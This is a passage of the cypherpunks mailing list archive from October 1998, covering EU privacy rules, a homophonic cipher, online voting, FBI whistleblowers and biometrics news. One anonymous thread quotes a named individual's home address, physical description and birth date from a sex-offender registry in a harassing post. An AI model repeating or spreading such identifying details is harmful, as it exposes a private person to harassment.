European data protection standards. On the other hand, the US did
not even manage to adopt the Guidelines on the Protection
of Privacy and Transborder Flow of Personal Data by OECD.
The discrepancy in the US system is exposed by the fact that
general laws for data protection and privacy were avoided in
favour of specific laws for single areas or techniques.

Other countries, in particular those in Eastern and Central
Europe have, in spite of massive lobbying by D. Aaron, adopted
laws on data protection and privacy since they do not want
endanger their future participation in the EU.

T. Schlickmann 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Theodor.SCHLICKMANN@BXL.DG13.cec.be
Date: Tue, 20 Oct 1998 16:49:43 +0800
To: <cypherpunks@Algebra.COM>
Subject: An Appraisal of the Technologies of Political Control
Message-ID: <WIN937-981020081831-2924*/G=Theodor/S=SCHLICKMANN/OU=BXL/O=DG13/PRMD=CEC/ADMD=RTT/C=BE/@MHS>
MIME-Version: 1.0
Content-Type: text/plain



http://www.europarl.eu.int/dg4/stoa/en/publi/166499/execsum.htm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Gillogly <jim@acm.org>
Date: Wed, 21 Oct 1998 02:26:07 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Homophonic substitution [could you help.....]
Message-ID: <362CCCAC.94253462@acm.org>
MIME-Version: 1.0
Content-Type: text/plain



Bernardo B. Terrado writes:
> It's about Homophonic  substitution and 
> map E to 17,19,23,47,64
> map A to 8,20,25,49
> map R to 1,29,65
> map T to 16,31,85
> but otherwise the ith letter maps to the 3ith letter
> MANY A SLIP TWIXT THE CUP AND THE LIP
> will become
> 3608397220543324451666246931852117066045253909162147332445
>
> My question is what/how did they represent the other letters like L (etc.)
> coz I've tried to map them and yet I still can't understand
> I even wrote A to Z then map them to 1 to 99, I still can't figure it out.

That's the "otherwise" rule right after the four "maps".  If the
2-digit number is divisible by 3 (like the first "36"), divide
it by 3 and count that many letters through the alphabet starting
with A.  The 12th letter (0-origin) is M, so 36 corresponds to M
and L corresponds to 33.

That particular example doesn't use the ciphertext space very efficiently:
only 41% of the available 2-digit numbers are used.  If you must use a
homophonic, I'd suggest a 100-letter pangram, which gives a reasonable
distribution of letters, full coverage of the alphabet, and some chance
of remembering the thing without carry incriminating documents.

-- 
	Jim Gillogly
	Sterday, 29 Winterfilth S.R. 1998, 17:38
	12.19.5.11.2, 13 Ik 15 Yax, Sixth Lord of Night




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Burnes - Denver <jim.burnes@ssds.com>
Date: Wed, 21 Oct 1998 01:36:00 +0800
To: Robert Hettinga <rah@shipwright.com>
Subject: Re: Dust off your anonymous voting protocols...
In-Reply-To: <v04020a04b2525b89c40b@[139.167.130.246]>
Message-ID: <Pine.SOL.3.91.981020105208.6031B-100000@denver>
MIME-Version: 1.0
Content-Type: text/plain



On Tue, 20 Oct 1998, Robert Hettinga wrote:

> Date: Tue, 20 Oct 1998 11:25:34 -0400
> From: Robert Hettinga <rah@shipwright.com>
> To: cryptography@c2.net, cypherpunks@cyberpass.net
> Subject: Dust off your anonymous voting protocols...
> 
> Now all we need is a modern-day Robbespierre?
> 
> I love the smell of mob rule in the morning?
> 
> Nawwwwww...
> 

I much prefer an electronic republic.

Enforced by order of magnitude cheaper digital cash backed by
whatever the market prefers.

Or as Bob H is so fond of inferring,

Real economics, like real physics, is not an option.

ignore them both at your own peril.

jim

too bad we don't have enough time to jumpstart it before
Y2K.  On the other hand maybe Y2K is the only thing that
will allow it.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "christian masson" <interception1001@hotmail.com>
Date: Wed, 21 Oct 1998 02:40:51 +0800
To: cypherpunks@cyberpass.net
Subject: NEWS
Message-ID: <19981020180832.12400.qmail@hotmail.com>
MIME-Version: 1.0
Content-Type: text/plain





NEWS

http://www.ec-europe.org/Communication/Reports/Infra/Communications/GSM-Content-lang1.html

______________________________________________________
Get Your Private, Free Email at http://www.hotmail.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Tue, 20 Oct 1998 23:58:40 +0800
To: cypherpunks@cyberpass.net
Subject: Dust off your anonymous voting protocols...
Message-ID: <v04020a04b2525b89c40b@[139.167.130.246]>
MIME-Version: 1.0
Content-Type: text/plain



Now all we need is a modern-day Robbespierre?

I love the smell of mob rule in the morning?

Nawwwwww...

Cheers,
Bob Hettinga

--- begin forwarded text


X-Sender: massmail@css
Mime-Version: 1.0
Date: Tue, 20 Oct 1998 10:46:02 -0600
To: rah@shipwright.com
From: cwheeler@activmedia.com
Subject: Will 'Net Ballots Supplant Congress?

          WILL DIRECT DEMOCRACY PRE-EMPT SOME OF CONGRESS'S POWER?
                 Questions Remain about Implementation

ActivMedia Research (http://www.activmedia.com) - Two of three Internet
afficionados think online elections are a good idea (66% to 33%). The same
proportion would like to be able to vote on ballot referenda and exercise
direct democracy via the 'Net (67%).

"Obviously, the technical ability to move toward direct democracy must be
accompanied by debate about its merits and what is an appropriate level of
technocratic and professional decision-making on our behalf," notes
ActivMedia's Director of Information Services Chris Anne Wheeler. "Some
laws are best implemented by professionals for the public good such as
environmental protection, national defense, and public welfare. But
virtually all online consumers polled in ActivMedia's FutureScapes agree
that a sunshine policy making legislative bills, voting records, and
budgets available online for public inspection would be a good idea (97%)."

-------------------------------------------------------------
                 CIVIC RESPONSIBILITIES ONLINE
                          (Good Idea)
                                  Total Sample  4+ Yrs Online
                                  ------------  -------------
Vote for elected officials              66%          71%
Vote on ballot referenda                67%          72%
Search bills, voting records, budgets   97%          98%
--------------------------------------------------------------
Source: FutureScapes Study, ActivMedia Research, (c) 1998


Survey respondents with 4+ years of online experience the greatest
propensity to want to vote online. As expected, younger (under 15) as well
as older (over 65) 'Netizens show a somewhat higher resistance to carrying
out civic responsibilities online. The conservatives in the Northeast show
a slightly greater resistance especially when it comes to voting for
elected officials (63%), but essentially the desire to vote online is
favored by the majority no matter their demographic background.

All across the country, websites are cropping up that help voters weed
through the oftentimes overwhelming amount of information on candidates and
issues. The greatest challenge for voters is tracking down objective
nonpartisan sources of candidate information. Trials of online voting are
scarce as policy-makers grapple with issues of fraud and security.


Data in this release is from ActivMedia Research's syndicated study
"FutureScapes: Refining 'Net Strategy for the 21st Century." The full study
of online habits and interests of 5,600 online citizens is available to
purchase for $2,995 (single copy) or $5,000 (multi-user site license).

ActivMedia Incorporated conducts custom and syndicated research that guides
businesses to profitable online positions. Since 1994, ActivMedia has been
detailing global 'Net trends and sector slices with a series of
quantitative research reports, market analyses and case studies. Insightful
analyses and accessible data support rational businesses decisions for
clients including Andersen Consulting, Cisco, IBM, Intel, Microsoft, Visa,
Yahoo and Ziff-Davis.

CONTACT INFORMATION
ActivMedia, Inc.
http://www.activmedia.com  (Research Home Page)
Email: research@activmedia.com
Harold Wolhandler, Vice President of Market Research
Chris Anne Wheeler, Director of Information Services
Tel: 800-639-9481, 603-924-9100
Fax: 603-924-2184

--- end forwarded text


-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Seggebruch - NYC SE <eric.seggebruch@East.Sun.COM>
Date: Wed, 21 Oct 1998 00:44:38 +0800
To: Blanc <blancw@cnw.com>
Subject: Re: My (Vince's) citizenship renunciation made difficult
In-Reply-To: <000701bdfbec$a511c220$588195cf@blanc>
Message-ID: <362CB592.B40A8AFF@east.sun.com>
MIME-Version: 1.0
Content-Type: text/plain



Blanc,

	Sometimes the best advice is to play the game, get what you want and
let well enough alone.  The fact that they may choose to do nothing does
not mean that bucking the United States of America is a good idea. 
Follow the administrative procedures, leave your anger at home and if
you want to change the way things are, work to be a good example of why
libertarian values are morally correct.  

Eric S




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Theodor.SCHLICKMANN@BXL.DG13.cec.be
Date: Tue, 20 Oct 1998 19:34:39 +0800
To: <cypherpunks@Algebra.COM>
Subject: Re(2): An Appraisal of the Technologies of Political Control
In-Reply-To: <199810201019.GAA04985@dewdrop2.mindspring.com>
Message-ID: <WIN937-981020105931-1817*/G=Theodor/S=SCHLICKMANN/OU=BXL/O=DG13/PRMD=CEC/ADMD=RTT/C=BE/@MHS>
MIME-Version: 1.0
Content-Type: text/plain



For full report please contact

rholdsworth@europarl.eu.int




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@Algebra.COM (Igor Chudov @ home)
Date: Wed, 21 Oct 1998 03:03:14 +0800
To: charrist@hotmail.com (Jason Winge)
Subject: Re: your mail
In-Reply-To: <19981020181936.20151.qmail@hotmail.com>
Message-ID: <199810201831.NAA20214@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text



there is no policy

just do not flood the list

igor

Jason Winge wrote:
> 
> Please send information on the policy of the list owner.
> 
> 
> 
> ______________________________________________________
> Get Your Private, Free Email at http://www.hotmail.com
> 



	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Wed, 21 Oct 1998 05:52:52 +0800
To: cypherpunks@cyberpass.net
Subject: IP: Privacy Under Threat
Message-ID: <199810202126.OAA13126@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: believer@telepath.com
Subject: IP: Privacy Under Threat
Date: Tue, 20 Oct 1998 02:37:56 -0500
To: believer@telepath.com

   PRIVACY UNDER THREAT

     The Global Internet Liberty Campaign has released its latest survey of
privacy in 50 countries. It found that new technologies including the
Internet are increasingly eroding privacy rights, but there is a growing
trend towards privacy and data protection acts around the world. Over 40
countries are in the process of enacting such laws. See
http://www.gilc.org/privacy/survey/  


****************************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address

or (un)subscribe ignition-point-digest email@address
****************************************************
www.telepath.com/believer
****************************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Wed, 21 Oct 1998 05:53:26 +0800
To: cypherpunks@cyberpass.net
Subject: IP: Former FBI Workers File Whistleblower Suit
Message-ID: <199810202126.OAA13137@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: believer@telepath.com
Subject: IP: Former FBI Workers File Whistleblower Suit
Date: Tue, 20 Oct 1998 09:40:46 -0500
To: believer@telepath.com

Source:  Washington Post
http://www.washingtonpost.com/wp-srv/WPcap/1998-10/20/021r-102098-idx.html

Former FBI Workers File Whistleblower Suit
Three Say Legal Protections Not Enforced

By Michael Grunwald
Washington Post Staff Writer
Tuesday, October 20, 1998; Page A17 

Three former FBI employees sued the federal government yesterday,
alleging that President Clinton and Attorney General Janet Reno have failed
to enforce a 1989 law that protects whistleblowers who complain about
misconduct at the agency.

Former FBI agent Thomas M. Chamberlin, former FBI chemist Jorge L.
Villanueva and former FBI staffer Cheryl J. Whitehurst all allege that they
were fired or forced out of the bureau for reporting misconduct by their
colleagues. Whitehurst also contends she was harassed because she is
married to Frederic Whitehurst, a chemist whose allegations launched a
major investigation of the FBI laboratory.

Congress exempted the FBI, the CIA and the National Security Agency
from the Whistleblower Protection Act of 1989, which established a
government-wide Office of Special Counsel to investigate complaints of
retaliation against employees of most federal agencies. But a companion
law directed the president to set up a separate system to protect FBI
employees from reprisals, and in April 1997, after a lawsuit by Frederic
Whitehurst, Clinton issued a memorandum directing Reno to create it.

Justice Department officials are drafting new regulations that would
establish an office at the department to handle internal complaints about the
FBI. But after 18 months of work, the regulations are not ready.

"This is not a simple process, but the attorney general is taking it very
seriously," said Justice Department spokesman Bert Brandenburg. "When
we're done with this, there will be a structure that FBI whistleblowers can
turn to with confidence. . . . We're trying to set up something entirely new
here. It's not just add water and mix."

Brandenburg said the department expects to issue new regulations soon,
but said he could not be more specific. But David K. Colapinto, an
attorney for the three former FBI employees, said the government has
been promising those regulations for nine years.

"They keep telling us it's in the works, but they never produce any results,"
Colapinto said. "Without whistleblower protection for FBI employees,
there cannot be effective oversight of the FBI's activities."

The FBI declined comment, referring questions to Brandenburg.
According to recent testimony by Justice Department inspector general
Michael Bromwich, the FBI received 499 allegations of "serious
misconduct" from its employees last year and another 518 allegations of
"routine misconduct." But since the employees who made them were not
covered by the Whistleblower Protection Act, they had no guarantee that
they could appear before an administrative law judge if they believed they
were victims of retaliation, or that they would have access to documents
about their case during the discovery process.

Frederic Whitehurst, once the FBI's top expert in explosives residue
analysis, recently settled his own whistleblower lawsuit with the bureau for
about $1.65 million. Bromwich's massive investigation did not substantiate
all of Whitehurst's allegations, but it did reveal major shortcomings at the
FBI lab. 

Cheryl Whitehurst said she was retaliated against for her husband's
activities and for reporting the widespread use of bootlegged software on
FBI computers in violation of copyright laws. She said she quit her job
under duress last month.

Villanueva, who also worked in the laboratory, said he lost his job in
January because he refused to sign a petition supporting a supervisor who
had been criticized in Bromwich's report, and because he complained that
a colleague had forged a signature on a lab report.

Chamberlin said he was fired in 1994 after he gave confidential testimony
about wiretap violations by the FBI's Detroit field office, and then
complained that the subsequent FBI investigation of the alleged violations
had targeted him. 

 (c) Copyright 1998 The Washington Post Company
-----------------------
NOTE: In accordance with Title 17 U.S.C. section 107, this material is
distributed without profit or payment to those who have expressed a prior
interest in receiving this information for non-profit research and
educational purposes only. For more information go to:
http://www.law.cornell.edu/uscode/17/107.shtml
-----------------------


****************************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address

or (un)subscribe ignition-point-digest email@address
****************************************************
www.telepath.com/believer
****************************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Wed, 21 Oct 1998 05:54:27 +0800
To: cypherpunks@cyberpass.net
Subject: IP: Biometric Weekly: 10-19-98
Message-ID: <199810202126.OAA13148@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: Biometric Weekly <biometrics-request@anet-stl.com>
Subject: IP: Biometric Weekly: 10-19-98
Date: Tue, 20 Oct 1998 08:48:10 -0600
To: ignition-point@majordomo.pobox.com

10-19-98

Welcome to "Biometric Weekly " - a weekly e-mail report on biometric
identification news - a service of the Biometric Digest.  "Biometric
Weekly" is distributed free of charge on Monday of each week.

............................................................................
....

Mentis Corp., a market research firm in Durham, N.C., says the biometric
market will total $100 million this year, a tiny fraction of the $100
billion spent on private security in the U.S. Yet Mentis predicts the
market will grow at a brisk 27% to 35% through 2000 as
pattern-recognition software improves, computers become better able to
handle the power-hungry biometric applications and prices fall.

............................................................................
....

Sonoma Resource Corp. has an agreement to acquire 45% of Biometric
identification Inc. . BII is an innovator in creating and applying
fingerprint authorization and verification technology.

............................................................................
....

Biometric Identification Inc. Chief Executive Officer Bob Kamm announced
his firm is collaborating with Key Source International to integrate Bio
ID silicon sensor fingerprint verification technology into Key Source
computer keyboards.

............................................................................
....

Biometric Identification Inc. announced the development and introduction
of prototypes for the first complete Biometric Fingerprint
Identification System that utilizes silicon sensor verification
technology.

............................................................................
....

SAFLINK Corporation, a wholly owned subsidiary of The National Registry
Inc. announced that it has licensed speech recognition and speaker
verification software technologies from Lernout & Hauspie Speech
Products N.V.

............................................................................
....

BERGDATA AG releases its new Fingerprint Software Developer's Kit .
Using this tool interested companies are able to develop and market
their own fingerprint based security applications.

............................................................................
....

Identix Inc. (ASE:IDX), a provider of live-scan and biometric
verification systems, announced the State of Wisconsin has chosen
Tacoma, Wash.-based
Sagem Morpho Inc. (Morpho), a subsidiary of Paris-based SAGEM SA, to
provide Identix TouchPrint 600(TM) live-scan systems and TouchPrint 602
card-scan systems for use by Wisconsin law enforcement agencies.

............................................................................
....

Philips Flat Display Systems (FDS), a division of Royal Philips
Electronics of the Netherlands, and Who? Vision Systems, Inc., a
developer of fingerprint biometric technologies and products, announced
they have partnered to develop and market a new line of flat fingerprint
sensors for an array of portable computing and consumer electronics
products.

............................................................................
....

T-NETIX, Inc. (Nasdaq: TNTX), a provider of specialized call processing
and fraud control software technologies, announced today it was awarded
a three-year contract, with an option for two additional years, for the
installation of its new Inmate Calling System to Bell Atlantic and AT&T
for the Commonwealth of Pennsylvania.

............................................................................
....

Speech recognition took a small step forward last week when four
companies announced that they had formed a V-Commerce Alliance to
promote the technology for electronic commerce. Details of these four
companies will appear in the next printed edition of the "Biometric
Digest."

............................................................................
....

-Sylvan/Identix Fingerprinting Centers, a joint venture of Sylvan
Learning Systems Inc. (SLVN) and Identix Inc. (IDX), received a contract
from UAL Corp.'s (U) United Airlines unit to provide fingerprinting
services. Sylvan/Identix said United will use Identix's TouchPrint 600
live-scan units in screening applicants to meet U.S. Postal Service
requirements for background checks on employees who handle mail.

............................................................................
....

Printrak International Inc. (AFIS) received a contract valued at more
than $45 million to provide automated fingerprint technology to the
government of Argentina. The company said it expects to have the system
up and running in less than a year. Printrak will work with prime
contractor Siemens Nixdorf GmbH, a unit of Siemens AG, to fulfill the
contract

............................................................................
....

Identix Inc. said it has won a contract for over $1.2 million to supply
fingerprint identification equipment to the Internal Revenue Service.
ANADAC Inc., a subsidiary of Identix, will supply the IRS with the
TouchPrint 600 system which scans fingerprints automatically. The
systems are being installed at IRS service centers throughout the nation
to automate the fingerprinting process which is a major part of all IRS
employee background checks.

............................................................................
....

A service of the "Biometric Digest," a monthly newsletter with weekly
e-mail updates published by Biometric Digest, P.O. Box 510047, St.
Louis, MO  63151-0047.  Tel: (314) 892-8632.   Fax: (314) 487-5198.

"Biometric Digest" is an advertising-free technology newsletter
dedicated solely to biometric identification technology.  More
information on the above is provided in the printed copy of the
"Biometric Digest." You can obtain additional biometric information from
our web site at:  http://www.biodigest.com.

The annual subscription is $255 in the United States and $325 outside
the U.S. To subscribe, please send e-mail with your name, title, company
name and address, email address, telephone and  fax to -
wrogers@anet-stl.com. We will send you an invoice.

For information on Banking on Biometrics Conference on October 12-14,
1998, visit http://www.biodigest.com/conf98

If you should wish to discontinue the Biometric Weekly news service, you
can cancel automatically by sending a request direct to:
biodigest-request@anet-stl.com

In the BODY of the memo, type -
   unsubscribe biometrics
   end

Note: on a second line type "end."

..... or please press your REPLY button and send us a return e-mail
requesting removal.





****************************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address

or (un)subscribe ignition-point-digest email@address
****************************************************
www.telepath.com/believer
****************************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Wed, 21 Oct 1998 05:56:21 +0800
To: cypherpunks@cyberpass.net
Subject: IP: Privacy Rules Send U.S. Firms Scrambling
Message-ID: <199810202126.OAA13159@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: believer@telepath.com
Subject: IP: Privacy Rules Send U.S. Firms Scrambling
Date: Tue, 20 Oct 1998 10:15:15 -0500
To: believer@telepath.com

Source:  Washington Post
http://www.washingtonpost.com/wp-srv/frompost/oct98/privacy20.htm

Privacy Rules Send U.S. Firms Scrambling 

By Robert O'Harrow Jr. 
Washington Post Staff Writer 
Tuesday, October 20, 1998; Page C1 

Business executives and government regulators have spent years noodling
about whether new rules are needed to protect an individual's right to
privacy in this information age. The European Union, by contrast, agreed
to "harmonize" its member states' tough privacy protections three years
ago, and regulations born of that agreement take effect next Monday, Oct.
26. 

That could be a big problem for many businesses on this side of the
Atlantic. Under the new rules, the EU's 15 member countries are obliged
to prohibit the transmission of names, addresses, ethnicity and other
personal information to any country that fails to provide adequate data
protection as defined under European law. European officials have said
repeatedly over the past year that the patchwork of privacy rules in the
U.S. may not meet their standards. 

Though no one expects the flow of information from Europe to stop
suddenly on Monday, anxiety about the new laws is growing because no
one is sure how they will be applied. Each country will have separate
privacy laws that cover the mandates of the EU directive, and all have
privacy agencies to oversee those laws. 

The kind of information covered by the regulations includes direct-mail
lists, hotel and travel reservations, medical and work records, orders for
products on the World Wide Web and a host of other data. 

Companies also will have to provide detailed disclosures to individuals
about how the data will be used and give those same individuals access to
the information to correct the data. 

To weigh the task at hand, consider that Citibank alone has 7.7 million
consumer accounts and about 9,000 employees in EU countries. 

"The scope is very broad," said Peter Swire, a law professor at Ohio
State University and co-author of "None of Your Business: World Data
Flows, Electronic Commerce, and the European Privacy Directive." 

"For major companies, there will be significant compliance issues," he
said. 

Thomas P. Vartanian, a D.C. lawyer and author of "21st Century Money,
Banking & Commerce," said the effects could be both sweeping and
quotidian. Consider the case of a German tourist who breaks a leg in New
York, he said. The tourist's health plan in Berlin may be unwilling or slow
to send medical records here. 

American companies also may be prohibited from transferring work
records of European employees. Moreover, direct marketers could face
sharp limitations on how they use lists of potential customers. 

Marketers, travel companies and other information-hungry firms in the
United States - from giant International Business Machines Corp. to
start-ups on the World Wide Web - are scrambling to assess what it
could mean for them. And government officials are meeting to head off
any potential crisis on Monday. 

"It holds the potential for leading to disruptions in the flow of data," said
David Aaron, undersecretary for international trade at the Department of
Commerce, who has been involved in talks with officials from the
European Commission. "This could have a major impact." 

The deadline has sharply etched differences in approaches to data
protection. Europeans consider information privacy a human right. Their
dreadful memories of how Nazi Germany used personal records in the
Holocaust played a role in development of the laws. In the United States,
industry and government officials have stubbornly resisted the regulation of
data collection, fearing restraints would stymie commerce and tread on the
First Amendment. 

Privacy advocates in Europe have made it clear they intend to press their
governments to be strict. A group called Privacy International has already
said it intends to monitor an array of U.S. and British companies, including
American Express Co., Citigroup, Microsoft Corp. and Visa
International. 

"Until there is some sense of certainty about how these rules are going to
apply, you're going to get what you always get with business uncertainty,
that is, you get delays and you get increased costs of doing business,"
Vartanian said. 

Charles Prescott, vice president of international business for the Direct
Marketing Association, agreed. "The uncertainty over how the directive
will be turned into local law is causing tremendous anxiety," said Prescott,
adding that hundreds of the group's U.S. members do extensive business
in Europe. 

In an effort to head off disruptions, Commerce Department officials have
been talking for months with counterparts in the European Commission,
the government body that helps coordinate regulations and policies that
affect all EU members. 

Those talks have eased fears of a sudden cutoff of data. Commission
officials said they are impressed by the Clinton administration's efforts to
highlight the importance of data protection and to press industry groups to
come up with a self-regulation framework to ensure privacy on the
Internet. 

"It's [in] nobody's interest, least of all ours, that we have a trade
dispute,"
said John F. Mogg, a director general of the European Commission, who
has been involved in talks with the Commerce Department's Aaron about
the matter. Mogg described the talks as "wholly constructive." 

Both Mogg and Aaron acknowledge, however, that significant differences
remain. Among the sticking points are provisions that give every citizen of
member countries the right to find out what information about them is in a
database and the power to correct mistakes. Few U.S. companies are
prepared to offer such access because of the costs involved. 

The directive also requires each outside country to have an independent
arbitrator to decide whether a company is being forthcoming about its
data. Mogg said that is "fundamental to us." But a system for such
accountability still does not exist in the U.S. Some countries also want
remedies to be available to citizens for violations. 

But officials say there are reasons for optimism. Many companies may be
able to meet the new guidelines by writing contracts that promise to
uphold key provisions, and by giving customers, employees and others
detailed disclosure statements about how their information will be used. 

A group called Privacy & American Business has worked with experts in
the United States and Europe to draft model contracts that would be
helpful, particularly for small and medium-size businesses that can't afford
to enter into lengthy negotiations. 

Companies also may be able to collect information from individuals who
give explicit consent, officials said. 

"The mood now is cautiously optimistic," said Harriet Pearson, director of
public affairs for IBM. Pearson said IBM has been working for more than
a year to prepare for the regulations and is in good shape to comply. But
she added that many questions remain unanswered for large and small
companies alike. "It's a very uncertain equation at this point," she said. 

 (c) Copyright 1998 The Washington Post Company
-----------------------
NOTE: In accordance with Title 17 U.S.C. section 107, this material is
distributed without profit or payment to those who have expressed a prior
interest in receiving this information for non-profit research and
educational purposes only. For more information go to:
http://www.law.cornell.edu/uscode/17/107.shtml
-----------------------


****************************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address

or (un)subscribe ignition-point-digest email@address
****************************************************
www.telepath.com/believer
****************************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Tue, 20 Oct 1998 21:26:21 +0800
To: cypherpunks@toad.com
Subject: Re: Happy Birthday to Convicted Child Molester Gary Burnore
In-Reply-To: <199810140550.HAA15476@replay.com>
Message-ID: <199810201238.OAA24270@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



Hackman <hacker@nospam.jump.net> wrote:

> James howard wrote:
> 
> > > Did anyone remember to wish convicted child molester Gary Lee
> > > Burnore a happy 41st birthday on Tuesday?  I was just doing a net
> > > search and came across this excerpt taken from his info on the North
> > > Carolina registered sex offenders' website:
> > >
> > > >   Street: 4201 BLAND ROAD APT J
> > > >   City: RALEIGH State: NC Zip: 27609 County: WAKE
> > > >
> > > >   Race: W Sex: M Height: 5'08" Weight: 170 LBS. Hair: BRO Eyes: BLU
> > > >   Birth Date(s): 10-13-1957
> > >     ^^^^^^^^^^^^^^^^^^^^^^^^^
> >
> > Why is it "Birth Date(s)"?  Is it possible to have more than one?
> 
> multiple alias ?

Since "Megan's law" where an effort has been made to warn residents
of a convicted child molester living in their neighborhood, I can
well imagine that many of them have resorted to using aliases.

Another possibility is that since so many of them have multiple
convictions on their rap sheets, and since the data entry operators
cannot always read an officer's handwriting, multiple *POSSIBLE*
birthdates for the same perp sometimes float around in the system.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lcs Mixmaster Remailer <mix@anon.lcs.mit.edu>
Date: Wed, 21 Oct 1998 02:13:09 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Another potential flaw in current economic theory...
Message-ID: <19981020174002.8373.qmail@nym.alias.net>
MIME-Version: 1.0
Content-Type: text/plain



> I see there are lots of interesting discussions on economy recently
> on this list. But I miss stuffs relating to the currently existing
> crisis of the financial market, topics like causes of failure of 
> LTCM etc. etc.

Haven't we discused the failures of Little Timmy C. May enough?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: postino.up.ac.za@toad.com
Date: Wed, 21 Oct 1998 01:16:40 +0800
To: hacklist@hackers.co.za
Subject: [ZA-Hacklist] Web Servers
Message-ID: <E0zVedQ-0005zq-00@postino.up.ac.za>
MIME-Version: 1.0
Content-Type: text/plain



Hi There,
this is an appeal
for help
WE are looking for someone to help us set up a remote
web server outside our network (internationally or therwise)
to experiment with running a web server through port 25 (SMTP) or 
port 110 (POP3). If you have the abilty to help us with this 
experiment it would be appreciated.
Contact us.
Any other comments appreciable too.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Blanc" <blancw@cnw.com>
Date: Wed, 21 Oct 1998 09:56:08 +0800
To: <cypherpunks@cyberpass.net>
Subject: RE: My (Vince's) citizenship renunciation made difficult
In-Reply-To: <362CB592.B40A8AFF@east.sun.com>
Message-ID: <000101bdfc93$c6846780$218195cf@blanc>
MIME-Version: 1.0
Content-Type: text/plain



>From Eric S:

: 	Sometimes the best advice is to play the game, get what
: you want and let well enough alone.  The fact that they may choose to do
: nothing does not mean that bucking the United States of America is a good
idea.
: Follow the administrative procedures, leave your anger at home and if
: you want to change the way things are, work to be a good
: example of why libertarian values are morally correct.
..............................................


Eric, I appreciate your concern for my safety.  <g>  But if playing the game was
the right way to do things, the 'cypherpunks' would not exist, PGP would not
have been created or distributed, John Gilmore would not have constructed his
DES cracker, and Vince would not have left the country, or now be trying to
change citizenship.

I realize that Vince was looking for more practical advice than I offered; I
didn't really expect him to take those ideas seriously (and I suspect some of
these also crossed his mind).    Bucking the US govmt directly may not appear to
be the best idea, but it depends on one's circumstance:   a person should do
what they feel is possible and agreeable to them in dealing with nonsense,
whether it is filling out and signing forms of defection, or stocking up on guns
and bullets the way Tim May does.

In any case, being a good example of why libertarian values are morally correct
is not something I would ever do.   Individuals have a mind of their own, and I
expect them to use it, to decide for themselves which values they will support.
I feel no obligation to present demos, no vested interest in converting anyone
to any side of an issue.  I will argue for reason and facts and reality, but I
would leave an individual to face the consequences of their own choices.  What I
am motivated to do, is object to having to take the consequences of somebody
*else's* choices.

(And Soren:   integrity and morality are not incompatible; in fact, they
co-exist and where one is reduced, the other is also diminished).

    ..
Blanc




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shadow <shadow@tfs.net>
Date: Wed, 21 Oct 1998 08:27:06 +0800
To: "Bernardo B. Terrado" <bbt@mudspring.uplb.edu.ph>
Subject: Re: desperate....
In-Reply-To: <Pine.GSO.3.96.981007122244.26809A-100000@mudspring.uplb.edu.ph>
Message-ID: <362D2291.2C22863F@tfs.net>
MIME-Version: 1.0
Content-Type: text/plain



>Could you give any info about wireless transmission especifically
>satellite transmission.

>Thank you and I desperately need your help.

Well lets see, what kind of government budget are you working with or
are just indepentantly wealthy?

It takes lots o' money to get setup in satellite transmission unless you
just want to receive the info then that is as cheap as getting a used
dish and the equipment to go with it. If you plan to transmit, then the
good ol' boys of the FCC will want your money for a license. Then there
are zoning laws to check into, construction permits, concret to pour,
power for it, and oh a wife that will put up with it in the yard.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Wed, 21 Oct 1998 08:26:41 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: SSZ - IRS update
Message-ID: <199810210013.TAA00301@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Hi,

Thought I'd drop a line about what's been going on around here for the last
few days....

The IRS and I have agreed upon an affadavit. I've now sent it off to them
and they will let me know if I still need to go to Seattle in Nov. for the
Grand Jury.

That's about it.


    ____________________________________________________________________
 
